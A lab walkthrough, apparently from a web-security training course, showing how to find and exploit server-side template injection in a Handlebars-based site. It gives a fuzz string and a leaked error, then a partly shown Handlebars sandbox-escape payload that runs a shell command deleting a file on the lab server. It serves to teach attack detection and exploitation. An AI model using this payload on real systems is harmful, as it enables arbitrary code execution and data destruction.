Server-side template injection in an unknown language with a documented exploit


This lab is vulnerable to server-side template injection.

Reproduction and proof of concept

  1. Notice that when you try to view more details about the first product, a GET request uses the message parameter to render Unfortunately this product is out of stock on the home page.

  2. Experiment by injecting a fuzz string containing template syntax from various different template languages, such as ${{<%[%'"}}%\, into the message parameter. Notice that when you submit invalid syntax, an error message is shown in the output.

<h4>Internal Server Error</h4>
                    <p class=is-warning>/opt/node-v18.12.1-linux-x64/lib/node_modules/handlebars/dist/cjs/handlebars/compiler/parser.js:267
            throw new Error(str);

Error: Parse error on line 1:
Node.js v18.12.1</p>

This identifies that the website is using Handlebars.

  1. Search the web for “Handlebars server-side template injection”. You should find a well-known exploit posted by @Zombiehelp54.

  2. Modify this exploit so that it calls require("child_process").exec("rm /home/carlos/morale.txt") as follows:

wrtz{{#with "s" as |string|}}
    {{#with "e"}}
        {{#with split as |conslist|}}
            {{this.push (lookup string.sub "constructor")}}
            {{#with string.split as |codelist|}}
                {{this.push "return require('child_process').exec('rm /home/carlos/morale.txt');"}}
                {{#each conslist}}
                    {{#with (string.sub.apply 0 codelist)}}
  1. URL encode your exploit and add it as the value of the message parameter in the URL. The final exploit should look like this:
  1. The lab should be solved when you load the URL.


An attacker will need to identify the template engine and find a documented exploit online that can be used to execute arbitrary code, and to delete the morale.txt file from Carlos’s home directory.